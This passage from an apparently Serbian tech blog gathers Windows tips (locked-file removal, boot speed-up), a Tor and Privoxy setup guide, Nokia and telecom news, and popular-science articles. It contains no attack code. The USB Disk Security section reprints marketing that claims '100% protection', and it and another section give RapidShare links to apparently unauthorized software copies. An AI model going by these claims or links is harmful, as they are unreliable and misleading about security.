Task Manager, izaberite File, New Task, upišite explorer.exe i pritisnite enter. Ovim postupkom ste ručno obrisali fajl i sada možete zatvoriti i komandni prompt i Task Manager. Što se tiče besplatnih programa koji ovu proceduru odrađuju automatski dobro su se pokazali sledeći Pocket KillBox koji je jednostavan za upotrebu, ali će obrisati i temporary fajlove, editovati Host fajl i uraditi još mnogo toga što možda ne biste želeli u tom trenutku. Unlocker će nakon instalacije omogućiti da desnim klikom aktivirate neku od funkcija programa, a detaljno uputstvo možete naći na sajtu proizvođača. Remove on Reboot Shell Extension omogućava da desnim klikom zadate da fajl bude obrisan nakon sledećeg startovanja računara.
Ubrzajte rad računara Više različitih faktora (softverskih i hardverskih) utiče na rad i na brzinu startovanja računara i podizanje Windows operativnog sistema. Postoji više načina da skratite vreme za koje će vaš računar doći u operativno stanje. Ana Labović Jedna od prvih je da napravite nekoliko jednostavnih izmena u BIOS-u računara. Prilikom uključivanja kompjutera u BIOS možete ući pritiskom na taster koji je odredio proizvođač. Najčešće su to DEL, F1, F2, F10, itd. U Boot podešavanjima odaberite opciju Quick Boot i namestite je na vrednost enable. Zatim nađite opciju Boot Device Priority i postavite da na prvom mestu bude hard disk. Potom možete podesiti neke opcije u samom Windowsu. Koristeći alat System Configuration Utillity možete izvršiti najviše potrebnih promena za brže podizanje sistema. Ovaj alat se već nalazi na vašem računaru i potrebno ga je samo pokrenuti: kliknite na Start meni, odaberite opciju Run, upišite msconfig i pritsnite Enter. Izaberite Startup karticu i videćete spisak svih programa i servisa koji se startuju prilikom pokretanja operativnog sistema. Svaka stavka koja je čekirana automatski se učitava pri svakom ulasku u Windows. Ukoliko se na spisku nalazi veliki broj, vreme za koje će operativni sistem biti spreman za rad se produžava. Zato jednostavno možete isključiti startovanje onih stavki koje vam nisu potrebne tako što ćete odštiklirati kvadrat koji se nalazi ispred njih. Naravno, morate voditi računa da ne isključite drajvere neophodne za rad samog računara. Nakon modifikacije ovog spiska restartujte računar. Oslobodite mesto na disku Oslobađanjem prostora na hard disku takođe ćete poboljšati performanse računara. Alatka Disk Celanup će vam u tome pomoći omogućavajući vam da se oslobodite nepotrebnih fajlova na disku kao što su: privremeni internet i Windows fajlovi, instalirani programi koje niste dugo koristili, komponente operativnog sistema koje vam nisu potrebne... Da biste ovo učinili, kroz Start meni potražite Program Files, Accessories, System Tools pa Disk Cleanup. Scandisk alat uradiće skeniranje vašeg diska na Fajl i Disk greške, a Defragmentation alat će analizirati i defragmentirati vaš hard disk. Ovi alati se mogu naći na tabu Tools na Properties od vašeg Hard diska. Obavezno skenirajte vaš računar na viruse i spyware komponente. Neki od besplatnih online virus skenera možete naći na sajtovima firmi Kaspersky, FSecure, TrendMicro ili Symantec. Na kraju, takođe, možete i hardverski nadograditi vaš računar dodavanjem dodatne memorije. Povećanjem RAM memorije omogućićete računaru da lakše i brže startuje programe kao i sam sistem.
TOR (The Onion Route)
Sta je TOR-mreza i kako se nejnom primenom moze obezbediti sigurno i anonimno surfovanje Internetom? Prilikom koriscenja Interneta, gotovo svaki korisnik se ponekad zapitao : Koliko sam zaista bezbedan prilikom pretrazivanja ili objavljivanja web - stranica, dok boravim na forumima, koristim mail - naloge ili pak usluge koje daju IRC – Internet Realy chat, SSH – Secure Shell i ostali TCP protokoli – Transmission Control Protocol…? Malo ozbiljnije korisnike web-a, sigurno zanima kako da svoju privatnost na Internetu zastite na nekom visem nivou a uz to da ostanu i potpuno anonimni!? Jedno vrlo dobro a uz to I free resenje, koje ce biti opisano u daljem nastavku teksta vezano je za koriscenje TOR-a tj. distribuirane mreze takozvanih Onion servera. Naime, koriscenjem ove mreze za anonimnost, mozemo spreciti analiziranje mreznog prometa koji smo ostvarili prilikom boravka na Internetu i tako zastiti svoju privatnost! 1. Na kom principu se zasniva rad TOR-mreze? Analizom Internet prometa moguce je saznati mnogo o aktivnosti bilo kojeg korisnika web-a, tj. mozemo saznati podatke koje salje ili prima, njihovu velicinu, vreme slanja i jos mnogo toga, cak iako su ti podaci kriptovani. TOR - mreza upravo stiti klijente od ovakve vrste analize njihove komunikacije, i to tako sto se unutar ove mreze transport podataka vrsi uspostavljanjem kriptovanih veza izmedju veceg broja nasumicno odabranih posrednika, odnosno preko lancano povezanih Proxy servera, koji se u ovom slucaju nazivaju Onion serveri, a od kojih ni jedan ne poznaje pravo izvoriste niti konacno odrediste podataka, ili tacnije jedan Proxy zna samo od kog Proxy servera iz lanca je dobio paket sa podacima i kojem Proxy-ju u lancu treba nadalje da ga prosledi. Tako da se veze u okviru TOR-mreze ostvaruju u koracima, a pri svakom koraku se koristi poseban enkripcijski kljuc, te se podaci koji putuju kroz TOR-mrezu visestruko kriptuju tj. u svakom koraku, sto samim tim otezava ili bolje receno onemogucava neovlasceno pregledanje njihovog sadrzaja. Posto se izvorna poruka visestruko kriptovala, putujuci kroz TOR-mrezu, tako je nastala jedna viseslojna struktura, te da bi se na krajnjem odredistu mogao videti njen pravi oblik, potrebno je samim tim i visestruko dekriptovati tu sada vec slozenu strukturu i to pocevsi od spoljnjih slojeva kako bi se doslo do unutrasnjih tj. do izvorne poruke. Ovaj postupak visestrukog dekriptovanja se opet obavlja preko jedanog nasumicno odredjenog broja Onion servera od kojih svaki sadrzi simetrican kljuc za dekriptovanje kao i upustvo za dalje prosledjivanje poruke. Tako da se poruka putujuci kroz TOR-mrezu, s Proxy-ja na Proxy sada ljusti kao luk (onion = luk - otuda ipotice naziv ovoe mreze) da bi se tek u zadnjem cvoru video njen originalan oblik. Na ovaj nacin se postize da prvi cvor u lancu zna odakle ali ne i gde saljemo podatke, a poslednji cvor lanca zna gde ali ne i odakle su podaci poslati!
Treba reci i to da se primaocu poruke, poslate kroz TOR-mrezu, zajedno sa poslatom porukom dostavlja i Onion za odgovaranje, pa je samim tim moguce to iskoristiti da se na isti, vec opisani nacin, izvrsi slanje poruke odnosno odgovora posiljaocu. 2. Kako se podesava TOR? Operativni sistemi koji omogucavaju koriscenje TOR-mreze su svakako Windows, zatim Linux, Unix, Mac OS i BSD. Medjutim, TOR-programski paket, nakon instalacije je podesen samo kao klijent, a postavke klijentske aplikacije nalaze se u konfiguracijskom fajlu, cija podesavanja zadovoljavaju potrebe vecine prosecnih korisnika. Naime, pored TOR-klijenta potreban nam je i program Privoxy, koji se inace ponasa kao http/https Proxy (by default na Portu 8118). Njegovo koriscenje je neophodno da bi se onemogucilo necije zlonamerno pristupanje nasim DNS-zahtevima (Domain Name Service), jer se u logovima naseg lokalnog DNS-servera tacno mogu videti svi sajtovi koje smo posecivali, stoga koriscenjem Privoxy-ja zelimo omoguciti da nas browser sa TOR-om komunicira preko socks 4a protokola, koji je u mogucnosti da preko Socks Proxy-ja resava DNS zahteve. Privoxy inace treba podesiti da u radu koristi TOR-mrezu i to tako sto cemo u konfiguracijskom fajlu Privoxy-ja podesiti liniju koja se inace odnosi na TOR: forward-socks4a / 127.0.0.1:9050 . Posto Privoxy sav nas ostvareni promet zabelezava i cuva u svojim zapisnickim datotekama, da bi se onemogucio taj zapis, potrebno je da na samom pocetku tri linije unutar konfiguracijskog fajla Privoxyja unesemo znak # , i tako ih pokrenemo. Te tri linije su: logfile logfile jarfil jarfile debug 1 # show each GET / COONECT request Zatim je potrebno ponovo pokrenuti Privoxy kako bi ucinjene izmene postale vazece. Da bi se, sada vec instalirani TOR i Privoxy, uskladili sa radom naseg web-browsera potrebno je postaviti parametre u browser , a toj postavci se pristupa na sledeci nacin: -Kod Mozille i Firefox-a na Windows Operativnom Sistemu idemo na: Tools – Options – Advanced – Network – Connection -Kod Internet Explorera radimo sledece: Internet Option – Connections – Lan Settings – Check Proxy Server -Advanced Sada u prva cetiri protokola, a to su: HTTP, SSL, FTP i Gopher unesimo sledece: localhost, a kao Port pisemo: 8118 na ovaj nacin smo izvrsili preusmerenje ka Privoxy-ju. Medjutim, u mesto za SOCKS treba uneti: localhost, a kao Port pisemo:9050 cime su svi protokoli, osim prva cetiri, usmereni ka TOR-klijentu. Nakon svih ovih podesavanja neophodno je pokrenuti Privoxy i pokrenuti TOR, kada nam se pojavi poruka: „Tor has successfully opened a circuit. Looks like cilent fuctionality is workong“
to znaci da smo sve dobro odradili i da mozemo poceti sa koriscenjem TOR-mreze. Jedna mala napomena pri koriscenju TOR-mreze je da tamo gde to mozemo iskljucimo Javu i ActiveX jer se oni lako mogu spojiti na neki server gde se moze zabeleziti nasa prava IP-adresa, takodje treba iskljuciti i javascript jer on moze otkriti nasu vremensku zonu... sto moze ostaviti sumnjiv trag o nama.
Zaustavite rad zeljene aplikacije u Startup-u Windowsa Vista U Windowsu Vista postoji default-ni panel koji vam ovo omogucava. Da biste brzo pristupili ovom panelu, mozete otvoriti Control Panel, a zatim kucati "startup" u search box-u. Link za "Stop a program from running at startup" momentalno se pojavljuje.
Sada mozete videti ekran Windows Defender koji vam omogucava rad sa Start-Up programima.
Mozete ukloniti, ili samo ugasiti bilo koju start-up stavku koristeci ovaj panel. Imacete pristup i mnogim drugim korisnim informacijama, pogotovo kada se malo bolje upoznate sa start-up procesima.
Rad sa vise monitora Omogucite vise razlicitih wallpaper-a na svakom desktopu u Visti ili XP-u. Umesto da placate software za odvojene wallpaper-e, ili kreirate wallpaper u Photoshop-u, Jon Tackabury kreirao je besplatan software DisplayFusion koji vam omogucava da jednostavno postavite zasebne wallpaper-e za svaki desktop. Jednom kada je software instaliran, primeticete novu tray ikonicu. Klikom na Desktop Wallpaper opciju iz desnog klika i menija otvoricete dijalog gde mozete podesiti wallpaper.
Mozete kliknuti na svaki desktop na displa-u i postavitit display podesavanja razlicita za svaki monitor, ili rasiriti jedan wallpaper preko oba (ili vise) monitora.
Ili mozete ucitati wallpaper iz Flickr, sto je sjajna mogucnost. Kucajte "vista wallpaper" i dobicete neke zaista dobre pozadine.
Ukoliko izaberete Settings iz menija tray ikonice, primeticete da ova aplikacija takodje dodaje citav set slovnih skracenica koje mogu koristiti za pomeranje prozora sa jednog monitora na drugi.
System Requirements * Windows 2000, 2003, XP or Vista * Microsoft .NET Framework v2.0 * DisplayFusion works best with multiple screens, but it can be used with just 1
Preuzmite aplikaciju ovde : DisplayFusion
Programi XP Srpski prevod
Download RapidShare Mirror : Srpski_Windows_XP.rar (4.2 Mb)
USB Disk Security
USB Disk Security provides 100% protection against any threats via USB drive, however, the majority of other products are unable even to guarantee 90% protection. USB Disk Security is the best antivirus software to permanently protect offline computer without the need for signature updates, but other antivirus software should update signature database regularly, and they cannot effectively protect offline computer. This light and easy to use solution is 100% compatible with all software and doesn't slow down your computer at all. You pay USB Disk Security once and get it all, however, other antivirus products should be paid for updates every year. Product Highlights: >> 100% protection against any malicious programs via USB storage USB Disk Security uses innovative proactive technology to block any threats via USB drive. There are relatively few products available in shops or on the Internet which offer even close to 100% protection against any malicious programs via USB drive. The majority of products are unable even to guarantee 90% protection. USB Disk Security is the world's best software to block threats via USB drive. >> The best solution to protect offline computer Other antivirus software should update signature database regularly, and they cannot effectively protect offline computer that is not connected to the Internet. When new viruses, worms and other malicious attacks strike, traditional signatures are insufficient. Every minute one waits for a virus signature update creates a window of vulnerability that could have devastating consequences. USB Disk Security uses advanced proactive detection techniques, requires no signature updates, and closes the window of vulnerability left open by other reactive, signature-based responses. >> The world's fastest and smallest antivirus software With USB Disk Security, it’s not necessary to sacrifice speed for detection and scanning. Compare antivirus software and you'll discover that USB Disk Security is by far one of the smallest applications in the industry. For example, the v5.0 of USB Disk Security installer is just 1 MB. The program utilizes approximately 1 to 7 MB of RAM. >> 100% compatible with all software Incompatibility between antivirus programs is an issue. In the vast majority of cases, installing two antivirus programs from different vendors on one machine (for increased protection) is technically impossible, as the two programs will disrupt each other's functioning. However, USB Disk Security is 100% compatible with all
software, including Windows Vista. >> Simple to use USB Disk Security has been specifically designed to perform effectively regardless of the user’s level of computer expertise. Just install and forget it. >>> System Requirement 100MHz Processor or more, 16MB RAM or more. The operating system should be Windows 95, Windows 98, Windows 2000, Windows XP, Windows NT 4.0, Windows ME, or Vista. Download: http://w15.easy-share.com/1700236141.html http://rapidshare.com/files/110285132/USB_Disk_Security_V5.0.0.55.rar
Arcadia PhotoPerfect
PhotoPerfect combines the power of a professional photo editing software with the simplicity of one-click image optimizations to give photo enthusiasts, semi-professional and professional photographers the ability to create the best possible images. Start using this photo editor with one-click photo optimizations; then challenge yourself to achieve your dream shot. PhotoPerfect offers you every photo enhancement functionality in one easy-to-use program. Learn here why PhotoPerfect is the best choice for every-day photography tasks and at the same time for professional and semiprofessional photographers. Imagine you have just returned from a great vacation and hundreds of pictures on your memory card. Do you have the time to individually optimize every single photo? Usually not! But thanks to PhotoPerfect applying the Xe847 Auto-Optimization to a complete directory full of pictures is also super easy.
Some features: - Fully automized one click image optimization with the included algorithm Xe847 - Brightness and contrast correction - Correction of flash effects, backlight effects and shadow brightening - Remove red eye effects
- Saturation setting (also selective) - Comprehensive histogram correction facilities - Perform retrospective white balance - Color balance, color temperature, stepless channel switch - Noise suppression / Color noise suppression - Various advanced softening and sharpening tools (USM) - Lab curves for editing images in Lab color space - Band filter for removal of symmetrical distortion - 16 bit support for RAW and TIFF files - Import and edit RAW files - Merging with Dynamic Range Increase (DRI) - Remove color casts using multi-stage gray balance technique - Comprehensive masking functions - Color vibrance for selectively tweaking the saturation of over- or under saturated areas - Intelligent retouching function with repair and remove brushes - MonochromiX extension for advanced black & white (grayscale) conversion - Color management for monitor display and output on various devices - Remove hot pixels and stuck pixels - Cut images to predefined or custom formats - Retouching (free drawing, cloning, shading etc.) - Insert logo, date and text - Lossless rotation and cropping - Measure and mark image content - Savable window and key combination profiles - Integrated scripting engine for VB- und JScripts - Improved support for Photoshop compatible plugins - Send images by email directly from PhotoPerfect - Image conversion into various formats - Integrated, fast image viewer - New, scriptable batch processing Size: 12.7 MB Download
Mobilna telefonija "Pametnice" iz Nokijine kuhinje
Nokija je u utorak, 26.08. predstavila dva nova multimedijalna mobilna telefona N serije pod oznakama N79 i N85. Finci se trude da zadrže vodeću poziciju među proizvođačima „pametnih telefona”, kojih je prodato 32,2 miliona samo u prvom tromesečju 2008. godine. Gotovo polovina (45 odsto) svetskog tržišta pripada Nokiji, za kojom slede Blekberi (13,4 odsti) i Epl (5,3 odsto). POVEZIVANJE - „Nokija N79” je monoblok, težak 97 grama, opremljen kolornim displejom dijagonale 6,1 cm, kamerom od 5 megapiksela (Karl Cajs optika) sa dva LED blica, 2.0 „blututom”, TV izlazom, radiom sa FM prijemnikom, priključkom za slušalice (3,5 mm) i sa deset „N-gage” video-igara. Mikro SD kartica od 4 gigabajta dovoljna je da smestite 3.000 pesama, 2.500 fotografija ili 4 sata video-klipova DVD kvaliteta (30 slika u sekundi). Poklon je tromesečno besplatno korišćenje navigacije. Podržava super brzi 3.5G, kao i GPS i Wi-Fi. Gotovo je identičnih dimenzija kao „nokija N78”, a prodavaće se po ceni od 350 evra u pet različitih boja - svetloplavoj, beloj, koral crvenoj, espreso braon i maslinastozelenoj. Model „nokija N85” (težina 128 grama) je dual-slajder, slično N96 telefonu. Kao i N79, raspolaže kamerom od 5 megapiksela (autofokus), ali ima za pola centimetara dužu dijagonalu OLED displeja. U paketu s telefonom dobija se i mikro SD kartica od 8 gigabajta. Sve ostale karakteristike (3.5G, radio s FM prijemnikom, 10 „N-gage” igara...) identične su modelu N79, osim naravno cene, jer će se N85 od oktobra prodavati za 450 evra. Baterija bi trebalo da bude dovoljna za 28 sati rada. Očekuje se da će N85 biti pun pogodak, jer u jednom ujedinjuje tri modela - N81 (igrački tasteri i dizajn), N96 (elegantni dual-slajder) i N95 (funkcije) po prilično razumnoj ceni. „Nokija N85“ je zamišljena kao zaokruženi paket mobilne zabave za povezivanje, razmenu i otkrivanje.
Nokia ugradila slabiji procesor u N96 Nokia ugradila slabiji procesor u N96!? Zapisano u (Hardware, Mobilni telefoni, Razno) | Autor: X3mE | Datum: 25-07-2008 Video sam jednu jako zanimljivu stvar upravo. Naime, upoređujući novi Samsung INNOV8 sa specifikacijama Nokije N96, primetio sam nešto što mi je do sad promicalo (ili je nedavno ispravljeno na Nokijinom sajtu), a to je da Nokia N96, najbolji telefon u Nokijinom repertoaru i njeno novo čudo i uzdanica za duže vreme, ima procesor radnog takta na mizernih 264 MHz. Ne znam da li je ovo greška, ali ako jeste - bolje bi bilo Nokiji da to ispravi, i to brzo. Dovoljno je to što je baterija mnogo manjeg kapaciteta nego što bi trebalo.
Nokia je do sad u svoje novije s60v3 telefone ugrađivala dve vrste procesora: 1) Single procesore, oznake ARM 11, radnog takta na 369 MHz. 2) Dual procesore (sa dodatnom FPU), oznake takođe ARM 11, radnog takta na 332 Mhz. Obično su Nokijini vrhunski Nseries modeli (poput recimo N95 ili N82) imali i dodatni 3D Graphics Hardware Accelerator, koji je dodatno rasterećivao glavni CPU. Što se N96 tiče, ne samo da nema 3D Graphics Hardware Accelerator, već je i radni takt oboren na mizernih 264 MHz. Tačno je da se radi o Dual CPU, ali opet ispada da N96 ima jedan od najslabijih procesora od svih s60v3 telefona. Sad, možda bi čovek pomislio da je greška, ali CPU ima čak i drugu oznaku - ARM 9. Možda ima neke nenavedene karakteristike (možda mnogo veći keš?) koje bi ga izdvojile od ostalih procesora, ali sve mi se čini da je Nokia na ovom polju uštedela. Što me još više odvlači ka pomenutom Samsungu.
Nokia drži 40% tržišta mobilniih
Nokia, najveći svetski proizvođač mobilnih telefona, ostvarila je u čevrtom kvartalu 2007. povećanje dobiti za 44 odsto. Neto dobit finske kompanije u četvrtom tromesečju prošle godine iznosio je 1,84 milijarde evra ili 47 evrocenti po akciji, što nadmašuje očekivanja Blumbergovih analitičara koji su predviđali dobit od 1,51 milijarde dolara. Prihodi kompanije porasli su za 37 odsto na 15,7 milijardi evra. Tržišni udeo Nokije bio je u četvrtom kvartalu veći nego zajednički udeo Motorole, Samsunga i Soni Eriksona, njenih najvećih konkurenata. Samsung i LG ciljaju visoku klasu mobilnih. Samsung Electronics i LG Electronics ozbiljno ciljaju visoku klasu mobilnih telefona. Te dve kompanije su došle do zaključka da korisnici često više cene funkcionalnost i dizajn od cene. Zvaničnici kompanije Samsung navode da kompanija planira da proda oko 50 miliona mobilnih telefona skupljih od 200 dolara u ovoj godini. Očekuje se da će Samsung prodati oko 200 miliona mobilnih telefona u 2008. Poređenja radi, u 2007. godini je južnokorejski gigant prodao 161.1 milion mobilnih telefona i trenutno drži drugo mesto na svetskom nivou. LG ima slične planove - oko 40 miliona telefona skupljih od 200 dolara. Pri svemu tome, LG planira da ukupno isporuči oko 100 miliona mobilnih telefona, tako da će telefoni više klase u njegovim isporukama imati značajniji udeo. LG trenutno drži peto mesto top liste proizvođača mobilnih telefona. Kompanija očekuje da će se u ovoj godini u zemljama u razvoju potražnja za mobilnim telefonima više klase povećati za oko 50 procenata.
Telenor omogucio prvi mobilni poziv iz aviona na svetu Fornebu, 25. mart 2008 – Prvi na svetu dozvoljeni poziv sa mobilnog telefona u toku komercijalnog avionskog leta obavljen je pošto je kompanija „Emirates Airline“ uspešno uvela sistem AeroMobile, zajednički poduhvat Telenora i ARINC.. Ovaj razgovor označava početak redovne upotrebe usluga mobilne telefonije i slanja i primanja podatka u avionima. Studije na terenu i tržišna istraživanja nedvosmileno pokazuju da je većini putnika, posebno poslovnim ljudima i onima koji često lete, veoma važno da imaju mogućnost mobilne komunikacije tokom leta. Rešenje AeroMobile-a omogućava putnicima da bezbedno koriste svoje mobilne telefone tokom leta, potpuno isto kao kad su na Zemlji. Pozivi se naplaćuju sa postojećeg mobilnog računa putnika kao međunarodni pozivi u romingu. „Većina ljudi ceni mogućnost da komunicira u svakoj prilici, pa i kad lete. Osim što nudi prvoklasnu uslugu mobilne telefonije u 12 zemalja, Telenor ima bogato iskustvo u oblasti satelitskih komunikacija, koje su ključne za mobilnu komunikaciju na brodovima i u avionima. AeroMobile je prirodno proširenje Telenorove ponude mobilnih usluga. Ponosni smo što smo zahvaljujući AeroMobile predvodnici na ovom novom tržištu,“ rekao je Bjarne Omot, potpredsednik Telenora i predsednik Upravnog odbora AeroMobile-a. Prvi poziv je obavljen na letu EK751 avio kompanije Emirata između Dubaija i Kazablanke 20. marta, pošto su dobijene sve potrebne dozvole. AeroMobile AeroMobile Limited je kompanija sa sedištem u Velikoj Britaniji u vlasništvu Telenor ASA i ARINC Inc. U odgovoru na tržišnu potražnju, Kompanija od 2003. godine teži da omogući bezbednu upotrebu mobilnih telefona i PDA (ručnih kompjutera) putnika. AeroMobile pruža celokupno rešenje za avio kompanije koje žele da ponude svojim putnicima i osoblju usluge mobilnih komunikacija na letovima. AeroMobile je prva komercijalno dostupna tehnologija mobilnih komunikacija na letovima. Sistem AeroMobile ima interfejs sa postojećim i budućim sistemima komunikacija vazduh-zemlja i koncipiran je tako da je u potpunosti u skladu sa važećim zahtevima za izdavanje uverenja za vazduhoplove/letivost i regulatornim zahtevima zemaljskih telekomunikacija. Za više informacija pogledajte http://www.aeromobile.net
Vip i Vodafon intenziviraju ekskluzivno strateško partnerstvo
Vip mobile i Vodafon, vodeća međunarodna grupacija iz oblasti mobilnih komunikacija u svetu, danas su svečano najavili da će intenzivirati svoje ekskluzivno strateško partnerstvo. Vipovi korisnici će se pridružiti Vodafonovoj globalnoj zajednici koja trenutno ima više od 520 miliona članova širom sveta: krajem 2007. godine Vodafon je imao preko 252 miliona korisnika u 25 zemalja na 5 kontinenata u kojima ima direktne investicije. Vodafon je dodatno prisutan i na 41 partnerskom tržištu, sa 270 miliona korisnika u više od 60 zemalja. Vodafon je najavio da će u Srbiji sarađivati ekskluzivno sa kompanijom Vip mobile. “Srbija je važno tržište telekomunikacija u Evropi koje se ubrzano razvija. Zato nam je drago što je Vodafon sada, kroz partnerstvo sa Vipom, u mogućnosti da ovdašnjim korisnicima ponudi kompletnu paletu internacionalnih proizvoda i usluga. Zadovoljni smo dugoročnom, veoma dobrom saradnjom sa mobilkom austria grupom, koja je poznata kao lider u inovacijama i po primeni visokih standarda poslovanja, i drago nam je što sada našu saradnju proširujemo i na Srbiju“, rekao je Pol - Gerhard Itjeshorst, izvršni direktor Vodafona za partnerska tržišta. Vip je prvi operater u Srbiji koji je ponudio Blackberry® iz Vodafona u decembru 2007. godine. “Parnerstvo Vipa i Vodafona donosi mnoge pogodnosti korisnicima. Ono spaja iskustvo vodeće međunarodne grupacije u oblasti mobilnih komunikacija u svetu i Vipovo poznavanje lokalnog tržišta, tako da će korisnici uživati u najboljem od oba sveta“, rekao je Alexander Šperl, predsednik Upravnog odbora Vip mobile. Zahvaljujući ovom partnerstvu, Vipovim korisnicima će u budućnosti biti ponuđene još inovativnije usluge i ekskluzivni telefoni, a imaće i pristup Vodafonovoj mreži međunarodnog rominga. Kako je objašnjeno na današnjoj konferenciji za novinare, oba partnera nastaviće da posluju kao nezavisne kompanije, ali Vip ima ekskluzivno pravo da svojim korisnicima nudi Vodafonove proizvode i usluge. Nekoliko članica mobilkom austria grupe, kao što su mobilkom austria (Austrija), Vipnet (Hrvatska), Mtel (Bugarska) i Si.mobil (Slovenija) već su sklopile partnerstvo sa Vodafonom. Vip mobile će dodati Vodafonov logo na sve proizvode i usluge koje bude nudio srpskom tržištu kao rezultat ovog partnerstva.
Nauka Zemlju ce progutati Sunce
Zemlju će nakon sagorevanja progutati umiruće Sunce - to je sudbina koju je našoj planeti predvideo Robert Smit, poznati britanski astronom, a koja nas čeka za 7,6 milijardi godina. Ovaj neuobičajen proračun Smit je objavio u britanskom časopisu „Astrofiziks“. Smit, koji predaje astronomiju na Univerzitetu u Saseksu, na jugu Engleske, tvrdi da će Sunce, kada ostane bez goriva, početi da se širi u opasnog crvenog džina. Prema njegovom mišljenju, iako će u tom procesu sagoreti, Zemlja će uspeti da izbegne potpuno uništenje. Smit kaže da će i pre te kataklizme život na Zemlji postati nepodnošljiv. Za milijardu godina, kako se Sunce bude polako širilo, okeani će isparavati, puneći atmosferu vodenom parom i podižući temperature na Zemlji. Smit smatra da naša planeta ima dve mogućnosti da izbegne tu strašnu kob. Jedna je da iskoristi gravitacioni trzaj izazvan prolaskom asteroida koji će odvući Zemlju van opasne zone. Jedan ovakav trzaj svakih 6.000 godina bio bi dovoljan da naša planeta preživi najmanje pet milijardi godina, osim ako usled loših proračuna asteroid ne padne na Zemlju umesto da prođe tik pored nje. „Sigurnije rešenje bilo bi da se sagradi flota interplanetarnih splavova koji bi stalno mogli da manevrišu van domašaja Sunca, ali, ipak, dovoljno blizu da koriste njegovu energiju“, kazao je Smit.
Pet velikih pitanja o zivotu Kako je zivot poceo? Pre 4 milijarde godina, Zemlja je iznutra bila super zagrevana nuklearnom i gravitacionom energijom, a spolja razarana udarima asteroidima. U to vreme nije izgledala baš kao stvorena za nastanak života - ali ipak, to se dogodilo. Još pre 50 godina je dokazano u laboratorijskim uslovima da su amino kiseline, osnovna građa proteina, mogle nastati na sprženoj Zemlji izloženoj raznim kosmičkim i UV zracima. Ali danas se smatra da su prvo postale RNK, koje nisu samo prenosile informacije, već su delovale i kao primitivni enzimi, katalizatori životnih procesa. Možda je pitanje nastanka života više geološko nego biološko pitanje. Trebalo bi uzeti u obzir geohemijsko okruženje rane Zemlje i zapitati se gde su se materija i energija mogle spojiti kako bi proizvele životne strukture i kakve bi termodinamičke i hemijske reakcije bile neophodne. Prvobitna Zemlja mogla je da ponudi samo dva prostora moguća za nastanak života: u nasipima nataloženih minerala na kiselim izvorima na obodu okeana, ili na alkalnim izvorištima negde na dnu okeana. Oba tipa staništa neprekidno stvaraju materiju i energiju i šalju je u okean, oba su dobro zaštićena i danas su naseljena živim organizmima.
Ako je život i započeo na ovim mestima, kakoje izgledao" Verovatno poput nepokretnih jedinjenja gvožđa i sumpora balončića. Polupropustljive, poluprovodljive i sposobne za katalizaciju, ove membrane su prethodile organskim membranama, i, najvažnije, spajale su molekularnu građu, pružajući odgovarajuće okruženje za životne hemijske procese. Ako su jedinjenja gvožđa i sumpora zaista učestvovala u stvaranju života na Zemlji, onda bi ovi beživotni mehurići mogli odigrati istu ulogu na bilo kojoj vlažnoj, kamenoj, suncem obasjanoj planeti u svemiru. Tako bi se nastanak života mogao dogoditi bilo gde u svemiru i trajati sve dok ima vode u tečnom stanju. Kako mutacije vode do evolucije? Genetske mutacije su osnovni materijal evolucije. Ali koje su mutacije važne" Biolozi su po tradiciji naglašavali promene u genima - DNK sekvencama koje nose šifru za proteine. Pretpostavka je da se takve mutacije dešavaju povremeno kod proteina sa drugačijim nizom amino kiselina koje daju pojedincu prednost u preživljavanju i vode evoluciji kroz prirodnu selekciju. Međutim, neki geni se uopšte ne menjaju milionima godina. Da li se ovakav spor tempo može odnositi na evoluciju morfologije i ponašanja" U skorije vreme došlo se do otkrića važne uloge koju u adaptivnoj evoluciji igraju mutacije u regionima DNK koji upravljaju ispoljavanjem gena. U prošloj deceniji otkriveni su Hox geni koji postoje kod različitog broja životinja, od vinske mušice do čoveka. Čini se da je evolucija očuvala gene, a izmenila njihovu interakciju i regulaciju kako bi nastale tako različite životinje, Takozvana cis regulacija dozvoljava organizmu da bira između različitih oblika istog gena, proizvodeći nešto drugačije proteine. Regulacija nam otkriva da više nije dovoljno posmatrati evoluciju iz ugla jednog gena. Sada postaje jasno da se mogu otkriti čitave mreže gena, što će povećati našu sposobnost da razumemo kako mutacije uzrokuju adaptivne promene uformi i funkcijama. Kako nastaju nove vrste? Ne tako davno smo mislili da znamo kako nastaju vrste. Verovali smo da taj proces gotovo uvek započinje potpunom izolacijom neke populacije. Biolozi još uvek misle da je geografska izolacija važan faktor, ali su se ideje udaljile od slučajnosti i malih populacija. Drugi važni faktori su ekološka selekcija (gde se nove vrste formiraju kao rezultat prilagođavanja promenljivim uslovima) i seksualna selekcija (gde izbor određenih seksualnih karakteristika vodi razilaženju unutar populacije). Jedna od najbojih ilustracija moći ekološke selekcije je paralelno nastajanje vrsta, gde se gotovo iste vrste javljaju nezavisno na različitim lokacijama kao odgovor na sličnu sredinu. Seksualna selekcija se može zasnivati, kao kod određene vrste tropskih riba, na sposobnosti ženskih jedinki da prave razliku između različito obojenih mužjaka i na taj način biraju samo one čije im boje više odgovaraju. Tako se može desiti da se populacije riba koje izgledaju slično mogu izolovati u reprodukciji što bi kasnije dovelo do nastanka nove vrste. U teoriji, može se testirati šta je uzrok nastajanja vrsta, traženjem »gena specijacije« - koji su odgovorni za sprečavanje parenja unutar različitih vrsta. Što se više genoma ispituje, naučnici su sve nestrpljiviji za pronalazak takvih gena. Da li se evolucija moze predvideti? Evolucija proizlazi iz ponavljajuće interakcije slučajnih i selektivnih sila. Postojanje nasumičnog elementa (mutacija, rekombinacija i migracija) i slučajnosti koje mogu uticati na preživljavanje jedinke i verovatnoću nalaženja para, sugerišu da se evolucija ne može ponavljati, predvideti, ona ne prati pravila. Ipak, kao što je Darvin primetio, slučajnost deluje rame uz rame sa prirodnom selekcijom. Njegova teorija predviđa da će se organizmi prilagoditi svojoj sredini. Međutim, svaka predviđanja na osnovu Darvinove teorije su nepouzdana. Danas postoji sve više dokaza za postojanje određenih osnovnih pravila evolucije. Bolje razumevanje mehanizama evolucije pruža nagoveštaje da su određeni ishodi verovatniji od drugih. lako postoji ograničen broj uspešnih rešenja za
